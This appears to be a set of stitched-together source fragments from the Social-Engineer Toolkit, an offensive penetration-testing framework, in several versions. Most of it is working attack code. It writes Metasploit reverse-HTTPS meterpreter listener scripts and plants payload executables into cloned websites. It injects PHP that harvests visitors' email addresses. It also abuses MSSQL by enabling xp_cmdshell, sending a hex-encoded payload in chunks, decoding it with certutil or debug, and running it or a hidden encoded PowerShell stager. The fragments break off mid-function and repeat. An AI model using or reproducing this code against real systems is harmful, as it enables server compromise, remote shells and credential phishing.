choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ") if choice == 'NO': pass # if we want to start the listener if choice == 'YES': with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set LPORT {0}\n" "set LHOST 0.0.0.0\n" "set ExitOnSession false\n" "exploit -j".format(port)) msf_path = core.meta_path() subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, "reports/powershell/powershell.rc")), shell=True).wait() core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell"))) core.return_continue() # if we select powershell reverse shell if powershell_menu_choice == "2": # prompt for IP address and port port = input(core.setprompt(["29"], "Enter the port for listener [443]")) # default to 443 if not port: port = "443"
#!/usr/bin/env python try: import readline except: pass from src.core.setcore import bcolors, get_version, check_os, meta_path # grab version of SET define_version = get_version() # check operating system operating_system = check_os() # grab metasploit path msf_path = meta_path() PORT_NOT_ZERO = "Port cannot be zero!" PORT_TOO_HIGH = "Let's stick with the LOWER 65,535 ports..." main_text = " Select from the menu:\n" main_menu = ['Social-Engineering Attacks', 'Fast-Track Penetration Testing', 'Third Party Modules', 'Update the Metasploit Framework', 'Update the Social-Engineer Toolkit', 'Update SET configuration', 'Help, Credits, and About'] main = ['Spear-Phishing Attack Vectors', 'Website Attack Vectors',
payload = "windows/meterpreter/reverse_https\n" # if we are using x86 command = x86 # assign powershell to command # write out our answer file for the powershell injection attack with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite: filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set LPORT {0}\n" "set LHOST {1}\n" "set EnableStageEncoding true\n" "set ExitOnSession false\n" "exploit -j\n" "use auxiliary/admin/smb/psexec_command\n" "set RHOSTS {2}\n" "set SMBUser {3}\n" "set SMBPass {4}\n" "set SMBDomain {5}\n" "set THREADS {6}\n" "set COMMAND {7}\n" "exploit\n".format(port, ipaddr, rhosts, username, password, domain, threads, command, stage_encoding)) # launch metasploit below core.print_status("Launching Metasploit.. This may take a few seconds.") subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")), shell=True).wait() # handle exceptions except Exception as e: core.print_error("Something went wrong printing error: {0}".format(e))
if choice == "YES": # Open the IPADDR file if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("LHOST IP address to connect back on: ") core.update_options("IPADDR=" + ipaddr) if core.check_options("PORT=") != 0: port = core.check_options("PORT=") else: port = input("Enter the port to connect back on: ") with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite: filewrite.write("use multi/handler\n" "set payload {0}\n" "set LHOST {1}\n" "set LPORT {2}\n" "set AutoRunScript post/windows/manage/smart_migrate\n" "exploit -j".format(payload, ipaddr, port)) print("[*] Launching Metasploit....") try: child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.setdir + "metasploit.answers"))) child.interact() except: pass
def web_server_start(): # define if use apache or not apache = False # open set_config here apache_check = core.check_config("APACHE_SERVER=").lower() if apache_check == "on" or track_email == "on": apache_path = core.check_config("APACHE_DIRECTORY=") if os.path.isdir(os.path.join(apache_path, "html")): os.path.join(apache_path, "html") apache = True if operating_system == "windows": apache = False # specify the web port web_port = core.check_config("WEB_PORT=") # see if exploit requires webdav if os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config")) as fileopen: for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) if match: match2 = re.search("set SRVPORT 8080", line) if not match2: web_port = 8080 # check ip address if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter your ip address: ") # unless we create template do self template = "SELF" # Grab custom or set defined if os.path.isfile(os.path.join(core.setdir, "site.template")): with open(core.setdir, "site.template") as fileopen: for line in fileopen: line = line.rstrip() template_match = re.search("TEMPLATE=", line) url_match = re.search("URL=", line) if url_match: # define url to clone here url = line.split("=")[1].rstrip() if template_match: template = line.split("=")[1] # if attach vector isn't set just set a default template attack_vector = "nada" # grab web attack selection if os.path.isfile(os.path.join(core.setdir, "attack_vector")): with open(os.path.join(core.setdir, "attack_vector")) as fileopen: for line in fileopen: attack_vector = line.rstrip() # Sticking it to A/V below rand_gen = random_string() # check multiattack flags here multiattack_harv = "off" if os.path.isfile(os.path.join(core.setdir, "multi_harvester")): multiattack_harv = "on" if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")): multiattack_harv = "on" # If SET is setting up the website for you, get the website ready for # delivery if template == "SET": # change to that directory os.chdir("src/html/") # remove stale index.html files if os.path.isfile("index.html"): os.remove("index.html") # define files and get ipaddress set in index.html if attack_vector == "java": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: match1 = re.search("msf.exe", line) if match1: line = line.replace("msf.exe", rand_gen) match = re.search("ipaddrhere", line) if match: line = line.replace("ipaddrhere", ipaddr) filewrite.write(line) # move random generated name shutil.copyfile("msf.exe", rand_gen) # define browser attack vector here if attack_vector == "browser": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: counter = 0 match = re.search(applet_name, line) if match: line = line.replace(applet_name, "invalid.jar") filewrite.write(line) counter = 1 match2 = re.search("<head>", line) if match2: if web_port != 8080: line = line.replace("<head>", '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr)) filewrite.write(line) counter = 1 if web_port == 8080: line = line.replace( "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr)) filewrite.write(line) counter = 1 if counter == 0: filewrite.write(line) if template == "CUSTOM" or template == "SELF": # Bring our files to our directory if attack_vector != 'hid' and attack_vector != 'hijacking': print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC) # copy all the files needed if not os.path.isfile(os.path.join(core.setdir, applet_name)): shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name)) shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name)) if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")): nix = core.check_options("NIX.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix)) if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")): mac = core.check_options("MAC.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac)) if os.path.isfile(os.path.join(core.setdir, "msf.exe")): win = core.check_options("MSF.EXE=") shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win)) # pull random name generation core.print_status("The site has been moved. SET Web Server is now listening..") rand_gen = core.check_options("MSF_EXE=") if rand_gen: if os.path.isfile(os.path.join(core.setdir, "custom.exe")): shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe")) print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now") shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen)) # if docbase exploit do some funky stuff to get it to work right if os.path.isfile(os.path.join(core.setdir, "docbase.file")): docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <FRAMESET rows="99%%, 1%%"> <FRAME src="site.html"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080"> </FRAMESET> </HTML>""".format(ipaddr)) if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")): os.remove(os.path.join(core.setdir, "web_clone/site.html")) shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"), os.path.join(core.setdir, "web_clone/site.html")) with open(core.setdir + "/web_clone/index.html", "w") as filewrite: filewrite.write(docbase) ########################################################################## # # START WEB SERVER STUFF HERE # ########################################################################## if not apache: if multiattack_harv == 'off': try: # specify port listener here # specify the path for the SET web directories for the applet # attack path = os.path.join(core.setdir, "web_clone/") try: import src.core.webserver as webserver p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path)) p.start() except: thread.start_new_thread(webserver.start_server, (web_port, path)) # Handle KeyboardInterrupt except KeyboardInterrupt: core.exit_set() # Handle Exceptions except Exception as e: core.log(e) print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??" "[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC)) stop_apache = input("Attempt to stop Apache? y/n: ") if stop_apache == "yes" or stop_apache == "y" or stop_apache == "": subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: # specify port listener here import src.core.webserver as webserver # specify the path for the SET web directories for the # applet attack path = os.path.join(core.setdir + "web_clone") p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path)) p.start() except: print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC)) sys.exit() # if we are custom, put a pause here to not terminate thread on web # server if template == "CUSTOM" or template == "SELF": custom_exe = core.check_options("CUSTOM_EXE=") if custom_exe: while True: # try block inside of loop, if control-c detected, then # exit try: core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!") input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC)) # handle keyboard interrupt except KeyboardInterrupt: print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC)) break if apache: subprocess.Popen("cp {0} {apache_path};" "cp {1} {apache_path};" "cp {2} {apache_path};" "cp {3} {apache_path};" "cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"), os.path.join(definepath, "src/html/*.html"), os.path.join(core.setdir, "web_clone/*"), os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "*.jar"), apache_path=apache_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait() # if we are tracking users if track_email == "on": now = datetime.datetime.today() with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite: filewrite.write("") subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait() # here we specify if we are tracking users and such with open(os.path.join(apache_path, "index.html")) as fileopen: data = fileopen.read() data = data.replace("<body>", "<body>" "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n" "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now)) with open(os.path.join(apache_path, "index.php"), "w") as filewrite: filewrite.write(data) core.print_status("All files have been copied to {}".format(apache_path)) ########################################################################## # # END WEB SERVER STUFF HERE # ########################################################################## if operating_system != "windows": # Grab metaspoit path msf_path = core.meta_path()
def deploy_hex2binary(ipaddr,port,username,password,option): # connect to SQL server target_server = _mssql.connect(ipaddr + ":" + str(port), username, password) setcore.print_status("Connection established with SQL Server...") setcore.print_status("Converting payload to hexadecimal...") # if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk if os.path.isfile("src/program_junk/set.payload"): web_path = ("src/program_junk/web_clone/") # then we are using metasploit if not os.path.isfile("src/program_junk/set.payload"): if operating_system == "posix": web_path = ("src/program_junk") subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait() subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait() fileopen = file("%s/msf.exe" % (web_path), "rb") # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file filewrite = file("src/program_junk/payload.hex", "w") filewrite.write(data) filewrite.close() # if we are using metasploit, start the listener if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): if operating_system == "posix": import pexpect meta_path = setcore.meta_path() setcore.print_status("Starting the Metasploit listener...") child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path)) # random executable name random_exe = setcore.generate_random_string(10,15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": # powershell command here, needs to be unicoded then base64 in order to use encodedcommand powershell_command = unicode("$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe,random_exe)) ######################################################################################################################################################################################################## # # there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt # in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly # ######################################################################################################################################################################################################## # blank command will store our fixed unicode variable blank_command = "" # loop through each character and insert null byte for char in powershell_command: # insert the nullbyte blank_command += char + "\x00" # assign powershell command as the new one powershell_command = blank_command # base64 encode the powershell command powershell_command = base64.b64encode(powershell_command) # this will trigger when we are ready to convert # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..") # reconfigure the stored procedure and re-enable try: target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1") target_server.execute_query("RECONFIGURE") target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1") target_server.execute_query("RECONFIGURE") except: pass # we selected hex to binary fileopen = file("src/payloads/hex2binary.payload", "r") # specify random filename for deployment setcore.print_status("Deploying initial debug stager to the system.") random_file = setcore.generate_random_string(10,15) for line in fileopen: # remove bogus chars line = line.rstrip() # make it printer friendly to screen print_line = line.replace("echo e", "") setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC) target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file)) setcore.print_status("Converting the stager to a binary...") # here we convert it to a binary target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file)) setcore.print_status("Conversion complete. Cleaning up...") # delete the random file target_server.execute_query("xp_cmdshell 'del %s'" % (random_file)) # here we start the conversion and execute the payload setcore.print_status("Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time fileopen = file("src/program_junk/payload.hex", "r") #random_exe = setcore.generate_random_string(10,15) while fileopen: data = fileopen.read(900).rstrip() # if data is done then break out of loop because file is over if data == "": break setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n") target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe)) setcore.print_status("Delivery complete. Converting hex back to binary format.") # if we are using debug conversion then convert our binary if option == "2": target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file)) target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe)) # clean up the old files setcore.print_status("Cleaning up old files..") target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe)) # if we are using SET payload if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): setcore.print_status("Spawning seperate child process for listener...") try: shutil.copyfile("src/program_junk/web_clone/x", definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options if os.path.isfile("%s/src/program_junk/port.options" % (definepath)): fileopen = file("%s/src/program_junk/port.options" % (definepath), "r") port = fileopen.read().rstrip() # if for some reason the port didnt get created we default to 443 if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443 # launch the python listener through pexpect # need to change the directory real quick os.chdir(definepath) # now back os.chdir("src/program_junk/web_clone/") setcore.print_status("Pausing 10 seconds to let the system catch up...") time.sleep(10) setcore.print_status("Triggering payload stager...") # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified import thread # execute the payload # we append more commands if option 1 is used if option == "1": random_exe_execute = random_exe random_exe = "powershell -EncodedCommand " + powershell_command sql_command = ("xp_cmdshell '%s'" % (random_exe)) # start thread of SQL command that executes payload thread.start_new_thread(target_server.execute_query, (sql_command,)) time.sleep(1) # trigger the exe if option 1 is used if option == "1": sql_command = ("xp_cmdshell '%s'" % (random_exe_execute)) thread.start_new_thread(target_server.execute_query, (sql_command,)) # if pexpect doesnt exit right then it freaks out if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass
def deploy_hex2binary(ipaddr, port, username, password): # base variable used to select payload option option = None choice1 = "1" conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password) core.print_status("Enabling the xp_cmdshell stored procedure...") try: conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;" "GO;" "RECONFIGURE;" "GO;" "exec master.dbo.sp_configure 'xp_cmdshell', 1;" "GO;" "RECONFIGURE;" "GO") except: pass # just throw a simple command via powershell to get the output try: print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""") choice = input("Enter your choice:\n\n" "1.) Use PowerShell Injection (recommended)\n" "2.) Use Certutil binary conversion\n\n" "Enter your choice [1]:") if choice == "": choice = "1" if choice == "1": core.print_status("Powershell injection was selected to deploy to the remote system (awesome).") option_ps = input("Do you want to use powershell injection? [yes/no]:") if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes": option = "1" core.print_status("Powershell delivery selected. Boom!") else: option = "2" # otherwise, fall back to the older version using debug conversion via hex else: core.print_status("Powershell not selected, using debug method.") option = "2" except Exception as err: print(err) payload_filename = None # if we don't have powershell if option == "2": # give option to use msf or your own core.print_status("You can either select to use a default " "Metasploit payload here or import your " "own in order to deliver to the system. " "Note that if you select your own, you " "will need to create your own listener " "at the end in order to capture this.\n\n") choice1 = input("1.) Use Metasploit (default)\n" "2.) Select your own\n\n" "Enter your choice[1]:") if choice1 == "": choice1 = "1" if choice1 == "2": attempts = 0 while attempts <= 2: payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):") if os.path.isfile(payload_filename): break else: core.print_error("File not found! Try again.") attempts += 1 else: core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.") choice1 = "1" if choice1 == "1": web_path = None #prep_powershell_payload() import src.core.payloadgen.create_payloads # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set if os.path.isfile(os.path.join(core.setdir + "set.payload")): web_path = os.path.join(core.setdir + "web_clone") # then we are using metasploit else: if operating_system == "posix": web_path = core.setdir # if it isn't there yet if not os.path.isfile(core.setdir + "1msf.exe"): # move it then subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (core.setdir, core.setdir), shell=True).wait() payload_filename = os.path.join(web_path + "1msf.exe") with open(payload_filename, "rb") as fileopen: # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite: filewrite.write(data) if choice1 == "1": # if we are using metasploit, start the listener if not os.path.isfile(os.path.join(core.setdir + "set.payload")): if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") msf_path = core.meta_path() child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"), os.path.join(core.setdir + "meta_config"))) # random executable name random_exe = core.generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": core.print_status("Using universal powershell x86 process downgrade attack..") payload = "x86" # specify ipaddress of reverse listener ipaddr = core.grab_ipaddress() core.update_options("IPADDR=" + ipaddr) port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT={0}".format(port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") #with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite = file(core.setdir + "/payload_options.shellcode", "w") filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.close() try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep # launch powershell #prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): os.makedirs(os.path.join(core.setdir + "reports/powershell")) #with open(os.path.join(core.setdir + "x86.powershell")) as x86: x86 = file(core.setdir + "x86.powershell").read().rstrip() # x86 = x86.read() x86 = "powershell -nop -window hidden -noni -e {0}".format(x86) core.print_status("If you want the powershell commands and attack, " "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell"))) filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") filewrite.write(x86) filewrite.close() # if our payload is x86 based - need to prep msfconsole rc if payload == "x86": powershell_command = x86 # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt" #with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite: filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w") filewrite.write("use multi/handler\n" "set payload windows/meterpreter/reverse_https\n" "set lport {0}\n" "set LHOST 0.0.0.0\n" "exploit -j".format(port)) filewrite.close() else: powershell_command = None # grab the metasploit path from config or smart detection msf_path = core.meta_path() if operating_system == "posix": try: core.module_reload(pexpect) except: import pexpect core.print_status("Starting the Metasploit listener...") child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"), os.path.join(core.setdir + "reports/powershell/powershell.rc"))) core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Be patient, Metasploit takes a little bit to start...") #child2.expect("Starting the payload handler", timeout=30000) child2.expect("Processing", timeout=30000) core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..") time.sleep(5) # assign random_exe command to the powershell command random_exe = powershell_command # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": # here we start the conversion and execute the payload core.print_status("Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen: fileopen = open(core.setdir + 'payload.hex', "r") core.print_status("Dropping initial begin certificate header...") conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) while fileopen: data = fileopen.read(900).rstrip() #for data in fileopen.read(900).rstrip(): if data == "": break core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD, data=data, endc=core.bcolors.ENDC)) conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data, exe=random_exe)) core.print_status("Delivery complete. Converting hex back to binary format.") core.print_status("Dropping end header for binary format conversion...") conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe)) core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.") conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe)) core.print_status("Executing the payload - magic has happened and now its time for that moment.. " "You know. When you celebrate. Salute to you ninja - you deserve it.") conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) # if we are using SET payload if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): core.print_status("Spawning separate child process for listener...") try: shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath) except: pass # start a threaded webserver in the background subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True) # grab the port options # if core.check_options("PORT=") != 0: # port = core.heck_options("PORT=") # # # if for some reason the port didnt get created we default to 443 # else: # port = "443" # thread is needed here due to the connect not always terminating thread, # it hangs if thread isnt specified try: core.module_reload(thread) except: import thread # execute the payload # we append more commands if option 1 is used if option == "1": core.print_status("Triggering the powershell injection payload... ") sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command)) thread.start_new_thread(conn.execute_query, (sql_command,)) # using the old method if option == "2": core.print_status("Triggering payload stager...") alphainject = "" if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")): with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen: alphainject = fileopen.read() sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) # start thread of SQL command that executes payload thread.start_new_thread(conn.execute_query, (sql_command,)) time.sleep(1) # if pexpect doesnt exit right then it freaks out if choice1 == "1": if os.path.isfile(os.path.join(core.setdir + "set.payload")): os.system("python ../../payloads/set_payloads/listener.py") try: # interact with the child process through pexpect child2.interact() try: os.remove("x") except: pass except: pass
def deploy_hex2binary(ipaddr, port, username, password, option): # connect to SQL server target_server = _mssql.connect(ipaddr + ":" + str(port), username, password) setcore.PrintStatus("Connection established with SQL Server...") setcore.PrintStatus("Converting payload to hexadecimal...") # if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk if os.path.isfile("src/program_junk/set.payload"): web_path = ("src/program_junk/web_clone/") # then we are using metasploit if not os.path.isfile("src/program_junk/set.payload"): web_path = ("src/program_junk") subprocess.Popen( "cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait() subprocess.Popen( "cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait() fileopen = file("%s/msf.exe" % (web_path), "rb") # read in the binary data = fileopen.read() # convert the binary to hex data = binascii.hexlify(data) # we write out binary out to a file filewrite = file("src/program_junk/payload.hex", "w") filewrite.write(data) filewrite.close() # if we are using metasploit, start the listener if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): meta_path = setcore.meta_path() setcore.PrintStatus("Starting the Metasploit listener...") child2 = pexpect.spawn( "%s/msfconsole -r src/program_junk/meta_config" % (meta_path)) # random executable name random_exe = setcore.generate_random_string(10, 15) # # next we deploy our hex to binary if we selected option 1 (powershell) # if option == "1": # powershell command here, needs to be unicoded then base64 in order to use encodedcommand powershell_command = unicode( "$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe, random_exe)) ######################################################################################################################################################################################################## # # there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt # in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly # ######################################################################################################################################################################################################## # blank command will store our fixed unicode variable blank_command = "" # loop through each character and insert null byte for char in powershell_command: # insert the nullbyte blank_command += char + "\x00" # assign powershell command as the new one powershell_command = blank_command # base64 encode the powershell command powershell_command = base64.b64encode(powershell_command) # this will trigger when we are ready to convert # # next we deploy our hex to binary if we selected option 2 (debug) # if option == "2": setcore.PrintStatus( "Attempting to re-enable the xp_cmdshell stored procedure if disabled.." ) # reconfigure the stored procedure and re-enable try: target_server.execute_query( "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;" ) # need to do it a second time for some reason on 2005 target_server.execute_query("RECONFIGURE;") except: pass # we selected hex to binary fileopen = file("src/payloads/hex2binary.payload", "r") # specify random filename for deployment setcore.PrintStatus("Deploying initial debug stager to the system.") random_file = setcore.generate_random_string(10, 15) for line in fileopen: # remove bogus chars line = line.rstrip() # make it printer friendly to screen print_line = line.replace("echo e", "") setcore.PrintStatus("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC) target_server.execute_query("xp_cmdshell '%s>> %s'" % (line, random_file)) setcore.PrintStatus("Converting the stager to a binary...") # here we convert it to a binary target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file)) setcore.PrintStatus("Conversion complete. Cleaning up...") # delete the random file target_server.execute_query("xp_cmdshell 'del %s'" % (random_file)) # here we start the conversion and execute the payload setcore.PrintStatus( "Sending the main payload via to be converted back to a binary.") # read in the file 900 bytes at a time fileopen = file("src/program_junk/payload.hex", "r") #random_exe = setcore.generate_random_string(10,15) while fileopen: data = fileopen.read(900).rstrip() # if data is done then break out of loop because file is over if data == "": break setcore.PrintStatus("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n") target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe)) setcore.PrintStatus( "Delivery complete. Converting hex back to binary format.") # if we are using debug conversion then convert our binary if option == "2": target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file)) target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe)) # clean up the old files setcore.PrintStatus("Cleaning up old files..") target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe)) # if we are using SET payload if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)): setcore.PrintStatus("Spawning seperate child process for listener...") subprocess.Popen( "cp src/program_junk/web_clone/x ./ 1> /dev/null 2>/dev/null", shell=True).wait() # start a threaded webserver in the background child1 = 